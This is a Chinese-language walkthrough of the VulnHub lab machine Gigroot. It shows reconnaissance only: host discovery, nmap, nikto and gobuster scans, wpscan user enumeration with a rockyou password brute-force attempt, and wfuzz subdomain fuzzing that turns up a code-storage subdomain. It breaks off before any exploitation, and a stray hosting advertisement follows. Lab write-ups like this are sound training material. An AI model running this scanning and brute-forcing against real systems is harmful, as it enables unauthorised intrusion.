Gigroot
识别目标主机IP地址
─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo netdiscover -i eth1 -r 192.168.56.0/24
Currently scanning: 192.168.56.0/24 | Screen View: Unique Hosts
3 Captured ARP Req/Rep packets, from 3 hosts. Total size: 180
_____________________________________________________________________________
IP At MAC Address Count Len MAC Vendor / Hostname
-----------------------------------------------------------------------------
192.168.56.1 0a:00:27:00:00:05 1 60 Unknown vendor
192.168.56.100 08:00:27:ab:4c:5b 1 60 PCS Systemtechnik GmbH
192.168.56.103 08:00:27:44:c8:1b 1 60 PCS Systemtechnik GmbH
利用Kali Linux的netdiscover工具识别目标主机的IP地址为192.168.56.103
NMAP扫描
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo nmap -sS -sV -sC -p- 192.168.56.103 -oN nmap_full_scan
Starting Nmap 7.93 ( https://nmap.org ) at 2023-04-29 22:08 EDT
Nmap scan report for localhost (192.168.56.103)
Host is up (0.000075s latency).
Not shown: 65532 closed tcp ports (reset)
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.9p1 Debian 10+deb10u2 (protocol 2.0)
| ssh-hostkey:
| 2048 bf45f6b3e3ce0c69185a5b27e5d39c86 (RSA)
| 256 b5d7455006c4e23c2852b806261fdeb0 (ECDSA)
|_ 256 27f0d02113309c5ef070a1d85ca78f75 (ED25519)
80/tcp open http Apache httpd 2.4.38 ((Debian))
|_http-title: Hey Jen
|_http-server-header: Apache/2.4.38 (Debian)
11211/tcp open memcache?
| fingerprint-strings:
| RPCCheck:
|_ Unknown command
1 service unrecognized despite returning data. If you know the service/version, please submit the following fingerprint at https://nmap.org/cgi-bin/submit.cgi?new-service :
SF-Port11211-TCP:V=7.93%I=7%D=4/29%Time=644DCDBD%P=x86_64-pc-linux-gnu%r(R
SF:PCCheck,27,"x81������x81���x0f���x02��������Unk
SF:nownx20command");
MAC Address: 08:00:27:44:C8:1B (Oracle VirtualBox virtual NIC)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 85.92 seconds
NMAP扫描结果表明目标主机有3个开放端口:22(ssh)、80(http)、11211(?)
获得Shell
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://192.168.56.103/
Hey Jen
Hey Jen, just installed wordpress over at wp.gitroot.vuln
please go check it out!
将wp.gitroot.vuln加入/etc/hosts文件中:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ sudo vim /etc/hosts
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.103 wp.gitroot.vuln
此时访问url,从返回页面可知目标为Wordpress站点:
http://wp.gitroot.vuln/
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ nikto -h http://wp.gitroot.vuln/
- Nikto v2.1.6
---------------------------------------------------------------------------
+ Target IP: 192.168.56.103
+ Target Hostname: wp.gitroot.vuln
+ Target Port: 80
+ Start Time: 2023-04-29 22:24:21 (GMT-4)
---------------------------------------------------------------------------
+ Server: Apache/2.4.38 (Debian)
+ The anti-clickjacking X-Frame-Options header is not present.
+ The X-XSS-Protection header is not defined. This header can hint to the user agent to protect against some forms of XSS
+ Uncommon header 'link' found, with contents: ──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ gobuster dir -u http://wp.gitroot.vuln/ -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x .php,.js,.html,.txt,.sh,.bak
===============================================================
Gobuster v3.3
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@firefart)
===============================================================
[+] Url: http://wp.gitroot.vuln/
[+] Method: GET
[+] Threads: 10
[+] Wordlist: /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt
[+] Negative Status codes: 404
[+] User Agent: gobuster/3.3
[+] Extensions: html,txt,sh,bak,php,js
[+] Timeout: 10s
===============================================================
2023/04/29 22:25:59 Starting gobuster in directory enumeration mode
===============================================================
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/index.php (Status: 301) [Size: 1] [--> http://wp.gitroot.vuln/]
/wp-content (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/wp-content/]
/wp-login.php (Status: 200) [Size: 3195]
/manual (Status: 301) [Size: 319] [--> http://wp.gitroot.vuln/manual/]
/wp-includes (Status: 301) [Size: 324] [--> http://wp.gitroot.vuln/wp-includes/]
/wp (Status: 403) [Size: 280]
/javascript (Status: 301) [Size: 323] [--> http://wp.gitroot.vuln/javascript/]
/readme.html (Status: 200) [Size: 7440]
/wp-trackback.php (Status: 200) [Size: 136]
/wp-admin (Status: 301) [Size: 321] [--> http://wp.gitroot.vuln/wp-admin/]
/xmlrpc.php (Status: 405) [Size: 43]
/.php (Status: 403) [Size: 280]
/.html (Status: 403) [Size: 280]
/wp-signup.php (Status: 302) [Size: 1] [--> http://wp.gitroot.vuln/wp-login.php?action=register]
/server-status (Status: 403) [Size: 280]
Progress: 1540385 / 1543927 (99.77%)===============================================================
2023/04/29 22:29:10 Finished
============================================================
因为我们已知目标运行wordpress站点,因此从gobuster和nikto工具运行结果中没有看到除了wordpress相关的目录文件之外的信息。接下来看是否可以用wpscan工具扫描出用户名或者可利用的插件。
─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -e u,p
[+] beth
| Found By: Author Posts - Display Name (Passive Detection)
| Confirmed By:
| Rss Generator (Passive Detection)
| Author Id Brute Forcing - Author Pattern (Aggressive Detection)
| Login Error Messages (Aggressive Detection)
wpscan工具扫描出用户名beth,看能否破解其密码。
(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ -U beth -P /usr/share/wordlists/rockyou.txt
没有破解出用户beth的密码,那看下可否扫描出插件。
─(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wpscan --url http://wp.gitroot.vuln/ --plugins-detection mixed
虽然扫描出插件akismet,但是该插件没有漏洞可利用。
会不会存在其他子域名?
将gitroot.vuln加入到/etc/hosts文件后,用wfuzz工具爆破子域名
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ wfuzz -c -u http://gitroot.vuln -H "Host:FUZZ.gitroot.vuln" -w /usr/share/seclists/Discovery/Web-Content/directory-list-2.3-medium.txt --hw 26
/usr/lib/python3/dist-packages/wfuzz/__init__.py:34: UserWarning:Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 3.1.0 - The Web Fuzzer *
********************************************************
Target: http://gitroot.vuln/
Total requests: 220560
=====================================================================
ID Response Lines Word Chars Payload
=====================================================================
000000001: 400 12 L 53 W 422 Ch "# directory-list-2.3-medium.txt"
000000003: 400 12 L 53 W 422 Ch "# Copyright 2007 James Fisher"
000000007: 400 12 L 53 W 422 Ch "# license, visit http://creativecommons.org/licenses/by-sa/3
.0/"
000000012: 400 12 L 53 W 422 Ch "# on at least 2 different hosts"
000000013: 400 12 L 53 W 422 Ch "#"
000000011: 400 12 L 53 W 422 Ch "# Priority ordered case-sensitive list, where entries were f
ound"
000000010: 400 12 L 53 W 422 Ch "#"
000000009: 400 12 L 53 W 422 Ch "# Suite 300, San Francisco, California, 94105, USA."
000000002: 400 12 L 53 W 422 Ch "#"
000000008: 400 12 L 53 W 422 Ch "# or send a letter to Creative Commons, 171 Second Street,"
000000005: 400 12 L 53 W 422 Ch "# This work is licensed under the Creative Commons"
000000006: 400 12 L 53 W 422 Ch "# Attribution-Share Alike 3.0 License. To view a copy of thi
s"
000000004: 400 12 L 53 W 422 Ch "#"
000000793: 200 131 L 578 W 10697 Ch "wp"
000002024: 400 12 L 53 W 422 Ch "'"
000003790: 400 12 L 53 W 422 Ch "%20"
000005302: 400 12 L 53 W 422 Ch "$FILE"
000005954: 400 12 L 53 W 422 Ch "$file"
000007004: 400 12 L 53 W 422 Ch "*checkout*"
000012898: 200 21 L 51 W 438 Ch "repo"
发现出repo子域名,将其加入到/etc/hosts文件中去:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
192.168.56.103 wp.gitroot.vuln
192.168.56.103 gitroot.vuln
192.168.56.103 repo.gitroot.vuln
利用浏览器访问子域名repo,此次返回内容为:
┌──(kali㉿kali)-[~/Vulnhub/Gigroot]
└─$ curl http://repo.gitroot.vuln/
Code storage
Welcome to our code storage area, we are currently storing a bunch of code here
Feel free to search our code base at get.php or set code in set.php
机房租用,北京机房托管,大带宽租用,IDC机房服务器主机租用托管-价格及服务咨询 www.e1idc.net
